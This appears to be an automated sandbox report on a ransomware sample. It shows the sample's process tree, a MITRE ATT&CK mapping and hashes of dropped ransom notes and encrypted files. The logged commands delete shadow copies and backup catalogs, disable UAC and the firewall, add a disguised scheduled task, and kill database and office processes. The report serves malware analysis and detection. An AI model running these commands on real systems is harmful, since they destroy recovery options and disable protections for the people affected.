"C:\Users\Admin\AppData\Local\Temp\sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:884
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /v /fo csv
    3⤵
    - Enumerates processes with tasklist
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- - C:\Windows\SysWOW64\findstr.exe
    findstr /i "dcdcf"
    3⤵
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:1812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:388
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
      4⤵
      PID:616
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:112
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /v
        5⤵
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
    - - C:\Windows\SysWOW64\find.exe
        
        find /I /c "dcdcf"
        5⤵
        
        PID:1948
    - - C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:1636
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:472
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq sample.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:536
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "sample.exe"
        5⤵
        
        PID:1556
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:388
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq sample.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:1200
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "sample.exe"
        5⤵
        
        PID:1204
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1128
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq sample.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:828
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "sample.exe"
        5⤵
        
        PID:1936
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1660
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq sample.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:1332
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "sample.exe"
        5⤵
        
        PID:1484
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:608
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq sample.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:1964
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "sample.exe"
        5⤵
        
        PID:432
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1044
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 90 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
    3⤵
    - Creates scheduled task(s)
    PID:1756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c echo %date%-%time%
  2⤵
  PID:1712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1332
- - C:\Windows\SysWOW64\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:1872
- - C:\Windows\SysWOW64\find.exe
    find /i "os name"
    3⤵
    PID:1268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
  2⤵
  PID:1084
- - C:\Windows\SysWOW64\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:1744
- - C:\Windows\SysWOW64\find.exe
    find /i "original"
    3⤵
    PID:1076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:1556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
  2⤵
  PID:1352
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:764
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1432
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1128
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    PID:524
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
    3⤵
    PID:652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
  2⤵
  PID:824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msftesql.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlagent.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlbrowser.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlservr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im oracle.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1352
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocssd.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbsnmp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im synctime.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopqos.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:396
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im isqlplussvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:652
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im xfssvccon.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopservice.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocautoupds.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im encsvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im firefoxconfig.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im tbirdconfig.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1124
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocomm.exe
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld.exe
    3⤵
    - Kills process with taskkill
    PID:524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-nt.exe
    3⤵
    - Kills process with taskkill
    PID:1944
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-opt.exe
    3⤵
    - Kills process with taskkill
    PID:980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbeng50.exe
    3⤵
    - Kills process with taskkill
    PID:1740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqbcoreservice.exe
    3⤵
    - Kills process with taskkill
    PID:1636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im excel.exe
    3⤵
    PID:432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im infopath.exe
    3⤵
    - Kills process with taskkill
    PID:2044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msaccess.exe
    3⤵
    - Kills process with taskkill
    PID:884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mspub.exe
    3⤵
    - Kills process with taskkill
    PID:1196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im onenote.exe
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im outlook.exe
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im powerpnt.exe
    3⤵
    - Kills process with taskkill
    PID:1972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im steam.exe
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat.exe
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat64.exe
    3⤵
    - Kills process with taskkill
    PID:752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thunderbird.exe
    3⤵
    - Kills process with taskkill
    PID:1176
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im visio.exe
    3⤵
    - Kills process with taskkill
    PID:856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im winword.exe
    3⤵
    - Kills process with taskkill
    PID:1636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im wordpad.exe
    3⤵
    - Kills process with taskkill
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im notepad.exe
    3⤵
    - Kills process with taskkill
    PID:544
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt
  2⤵
  PID:1608
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Read_Me!_.txt
  2⤵
  PID:824

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1096

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt
1⤵
PID:1124

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe"
1⤵
- Executes dropped EXE
- Deletes itself
- Drops startup file
- Drops desktop.ini file(s)
PID:844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /v /fo csv
    3⤵
    - Enumerates processes with tasklist
    - Suspicious behavior: EnumeratesProcesses
    PID:1740
- - C:\Windows\SysWOW64\findstr.exe
    findstr /i "dcdcf"
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /PID 112", /f
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /PID 112", /f
    3⤵
    - Kills process with taskkill
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:1484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
    3⤵
    PID:1572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
      4⤵
      PID:608
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "
      4⤵
      PID:1940
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /v
        5⤵
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        
        PID:1044
    - - C:\Windows\SysWOW64\find.exe
        
        find /I /c "dcdcf"
        5⤵
        
        PID:1628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
    3⤵
    - Creates scheduled task(s)
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1964
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    PID:884
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
  2⤵
  PID:1968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msftesql.exe
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlagent.exe
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlbrowser.exe
    3⤵
    - Kills process with taskkill
    PID:1064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlservr.exe
    3⤵
    - Kills process with taskkill
    PID:1180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    PID:1488
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im oracle.exe
    3⤵
    - Kills process with taskkill
    PID:1052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocssd.exe
    3⤵
    - Kills process with taskkill
    PID:2008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbsnmp.exe
    3⤵
    - Kills process with taskkill
    PID:1388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im synctime.exe
    3⤵
    PID:856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopqos.exe
    3⤵
    - Kills process with taskkill
    PID:1980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im isqlplussvc.exe
    3⤵
    - Kills process with taskkill
    PID:608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im xfssvccon.exe
    3⤵
    - Kills process with taskkill
    PID:960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopservice.exe
    3⤵
    - Kills process with taskkill
    PID:1956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocautoupds.exe
    3⤵
    - Kills process with taskkill
    PID:1792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    - Kills process with taskkill
    PID:320
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im encsvc.exe
    3⤵
    - Kills process with taskkill
    PID:1364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im firefoxconfig.exe
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im tbirdconfig.exe
    3⤵
    - Kills process with taskkill
    PID:1388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocomm.exe
    3⤵
    - Kills process with taskkill
    PID:856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld.exe
    3⤵
    - Kills process with taskkill
    PID:2004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-nt.exe
    3⤵
    - Kills process with taskkill
    PID:1980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-opt.exe
    3⤵
    - Kills process with taskkill
    PID:608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbeng50.exe
    3⤵
    - Kills process with taskkill
    PID:960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqbcoreservice.exe
    3⤵
    - Kills process with taskkill
    PID:1956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im excel.exe
    3⤵
    - Kills process with taskkill
    PID:1792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im infopath.exe
    3⤵
    PID:320
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msaccess.exe
    3⤵
    - Kills process with taskkill
    PID:1364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mspub.exe
    3⤵
    - Kills process with taskkill
    PID:1268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im onenote.exe
    3⤵
    - Kills process with taskkill
    PID:1388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im outlook.exe
    3⤵
    - Kills process with taskkill
    PID:856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im powerpnt.exe
    3⤵
    - Kills process with taskkill
    PID:2004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im steam.exe
    3⤵
    - Kills process with taskkill
    PID:1980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat.exe
    3⤵
    - Kills process with taskkill
    PID:608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat64.exe
    3⤵
    - Kills process with taskkill
    PID:960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thunderbird.exe
    3⤵
    - Kills process with taskkill
    PID:1956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im visio.exe
    3⤵
    - Kills process with taskkill
    PID:1792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im winword.exe
    3⤵
    - Kills process with taskkill
    PID:1776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im wordpad.exe
    3⤵
    PID:1360

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
1⤵
- Modifies registry key
PID:1992

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\Read_Me!_.txt

Filesize
1KB

MD5
fc405ed23b70ee3e5cc59470f58aa78e

SHA1
4ad3f0f3e67dd3f183f0504d66057b32270fbecc

SHA256
346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d

SHA512
622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562

Download Submit
C:\$Recycle.Bin\S-1-5-21-1819626980-2277161760-1023733287-1000\Read_Me!_.txt

Filesize
1KB

MD5
fc405ed23b70ee3e5cc59470f58aa78e

SHA1
4ad3f0f3e67dd3f183f0504d66057b32270fbecc

SHA256
346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d

SHA512
622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562

Download Submit
C:\MSOCache\All Users\Read_Me!_.txt

Filesize
1KB

MD5
fc405ed23b70ee3e5cc59470f58aa78e

SHA1
4ad3f0f3e67dd3f183f0504d66057b32270fbecc

SHA256
346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d

SHA512
622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab[[email protected]].CCBG

Filesize
22.8MB

MD5
ca684ab780779995446dff3ded5272cf

SHA1
684045a411c8cb4ed226fe128155dee41eb8d1f8

SHA256
d8704d97354d84b2ef6ec6b1033a05e083145c3b84333aa20baa407f3c1d5ff7

SHA512
17b2ebd3691c31593cab0afb7923dcbf1e8bc9354f146ca0cd4b8a80ceceeb14ccfa10b929cdc568bc66e832dfcc6ac197002aa74d9a337ed21cbd7e85e719a2

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.msi[[email protected]].CCBG

Filesize
2.9MB

MD5
499c3fe39287dc8c3900f14264465fc7

SHA1
724619131dd0e4ab3f1badaf7f74a53cd7c26b04

SHA256
c7ab4e83a1e3e0de02bc0998585c918c859292401f9a4f4fde1dcd0c6ac0338d

SHA512
afab6a6bd0f89b82b20ea53784e78b5c424329c5f98dd6a3826ab526931cb8798a36fb75bace0cbe4a06ee1813f5271a7e10285eadeb261a8d9b3592b7d33d97

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml[[email protected]].CCBG

Filesize
4KB

MD5
e1bf2f254f17e549d545ba5a7aa81b80

SHA1
a368b571d95146189ece339ab434d21d1dfe6266

SHA256
8f86115bf95dc60080392a4af38a845e6f3a0aaa6e275141ab92bd6f34cdd599

SHA512
b22120a9908f8e9303f1c9a88d25389db961aa50e1a20cb3d736148c3d2602a73df6e952a55d3bef8bdd7212850b2e482edf37f1c4ffb88184a73c19f5400cac

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi[[email protected]].CCBG

Filesize
23.7MB

MD5
ad9d1d2ef5f214f6112930ade173de07

SHA1
beb3be3dcc8e6b47c9cf2225a0fd2568d11a68c0

SHA256
bff2d36d0b213b0d9fc85ec65a6439c06166b9c71ec3951bc6c46a710b34c1bd

SHA512
3098742a96568048a1ef9fca62f1d5eb84a8a136e60785bb7bc691013d671ac680badb5de74452c62e61f1c3344b34e634c8c115b73922ae74b1cb6680a2fccc

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml[[email protected]].CCBG

Filesize
17KB

MD5
552556a94f9200d67b05c84aa163927f

SHA1
f2dab95befcb11fde699cc1f351e096a960dd48d

SHA256
47ce33f061c80684a684c33da3e1971351fe9e4115e26fbc89e22aa37d106cdf

SHA512
